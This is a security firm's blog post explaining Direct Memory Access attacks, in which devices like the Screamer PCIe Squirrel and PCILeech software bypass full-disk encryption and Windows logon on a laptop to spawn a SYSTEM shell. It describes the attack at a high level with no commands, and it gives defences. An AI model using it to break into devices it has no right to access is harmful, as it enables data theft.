Have you ever come across a laptop, server or desktop computer that has Full Device Encryption (FDE) and protected by a password/logon screen that you would like to hack into easily? Well Direct Memory Access (DMA) attacks can easily bypass these security measures given a few preconditions.
In this blog post we are going to explore how a hacker can easily utilise Direct Memory Access attacks to gain full control over a computer system and discuss what you and your organisation can do to prevent such types of attacks.
Direct Memory Access is a legitimate feature of computer systems that allows certain hardware subsystems to access main system memory independently of the central processing unit (CPU) allowing for high-speed data transfer. Numerous hardware devices use DMA, including disk drive controllers, graphics cards, network cards and sound cards.
These hardware devices connect to the computer via several DMA capable connections such as PCI Express, PCI, Thunderbolt, USB 4.0, FireWire, ExpressCard and CardBus. These connections allow for transfer of data between the device itself and the computer at maximum speeds possible by having direct read and write access to the main memory without any Operating System (OS) supervision or interaction.
All modern computer systems such as laptops, servers and desktop computers have at least one form of a DMA capable connection such as Thunderbolt or PCI Express. These common connections can give a hacker an opportunity to potentially bypass all OS security mechanisms such as the Windows password logon/lock screen, gain access to all physical memory address space despite having FDE as the operating system memory is decrypted when in operation which allows for stealing of the systems unencrypted data such as cryptographic keys and even allows for the installation of various malware such as keyloggers and backdoors for example.
There are a several scenarios where a hacker can try to perform a DMA attack such as a gaining access to a stolen device like a laptop, performing a DMA drive by attack where the hacker quickly plugs a DMA attack device into a PCI Express slot or Thunderbolt port while the device is not attended or by sending a victim a rouge DMA device disguised as a normal everyday device as part of a social engineering attack.
At SureCloud, one of the scenarios we like to test as part of a Red Team engagements is what happens if a client’s devices such as a laptop gets stolen by a hacker and what can they do with it? Most organisations these days implement Full Device Encryption via BitLocker for example and are protected by operating system logon screens such as the Windows logon screen that prompt for the user’s password when starting up a Windows based device. There are currently no publicly known software-based vulnerabilities that bypass these security mechanisms, and this is where DMA attacks can be useful for hackers as it allows them to bypass these security measures with the help of a specialised DMA device such as the Screamer PCIe Squirrel, LeetDMA, Enigma-x1 and USB3380-EVB to name a few. These devices can easily be purchased online are commonly used for various other purposes such as game hacking and kernel code debugging. The specialised DMA device is plugged into the stolen laptop either via PCI Express capable slot such as a M.2 slot or via a Thunderbolt port. It should be noted that for this attack to work a few security features in the BIOS need to be off which are sometimes set to off by default or can be changed by a hacker if there is no BIOS password. Thus, if your organisation or your personal device does not have a BIOS password, we highly recommend implementing one to prevent a hacker from switching off security features that help protect against various attacks such as DMA attacks.
Figure 1: DMA Attack Devices
Another important part of the DMA attack is the software that helps to make the DMA attacks easily executable. The most popular DMA attack software is called PCILeech created by the father of DMA attacks Ulf Frisk which uses the DMA hardware device to read and write to the system memory allowing for easy access to live memory and the file system via a mounted drive. PCILeech also makes it possible to remove the OS logon password requirements, loading of unsigned drivers, execution of code and spawning of system shells and it supported target system is currently the x64 versions of: UEFI, Linux, FreeBSD and Windows.
Here are some of the features that PCILeech is capable of:
Source: https://github.com/ufrisk/pcileech
As you can see these features are a treasure trove for hackers as it allows the hacker to perform some very powerful operations to bypass security on almost all popular Operating Systems such as Linux and Windows. The next section will demonstrate some of these attacks here.
The target device is a modern-day Windows 10 based laptop that is password protected and has no BIOS password. The DMA Device (Screamer PCIe Squirrel) was connected to a free M.2 slot on the Laptops Motherboard with a M.2 to PCI Express 4x extension cable. The hacker then attaches a USB Type C cable from the DMA device to the hacker’s laptop to run PCILeech software and can execute various command such as:
Figure 2: DMA Attack against a Laptop using Screamer PCIE Squirrel DMA device and PCILeech Software to spawn a cmd.exe shell as NT/System Authority.
Figure 3: PCILeech software used to load code into the Kernel on the Windows 10 Laptop and spawn a cmd.exe shell as NT/System Authority.
Figure 4: Mounting the target systems memory using PCILeech and using file explorer to view the contents.
To prevent DMA attacks the first and most obvious part is physical security. Preventing unauthorised access to a physical device and its slots/ports will prevent hackers from performing this type of attack as physical access is required. If the device is within public spaces and can’t be securely stored away or is stolen the following settings are crucial to prevent DMA attacks.
It’s recommended that as much of these settings be enabled, if possible, to prevent DMA attacks as there is no single security solution that can protect against DMA attacks alone. DMA attacks are just one type of a physical attack and there are many more that an organisation needs to be aware of such as malicious USB devices, attacks that target the BIOS/UEFI firmware and attacks against the TPM module.
[1] - Wikipedia - Direct memory access
[3] - MITRE Attack - Hardware Additions
[5] - GitHub - PCILeech Repository
[6] - Direct memory access protections for Mac computers
[7] - Linux hardening against DMA attacks
[8] - Microsoft - BitLocker countermeasures
[9] - Microsoft - Kernel DMA Protection
[10] - Microsoft - Kernel DMA Protection (Memory Access Protection) for OEMs
[11] - Microsoft - Policy CSP : DmaGuard
[12] - DEF CON 24 - Ulf Frisk - Direct Memory Attack the Kernel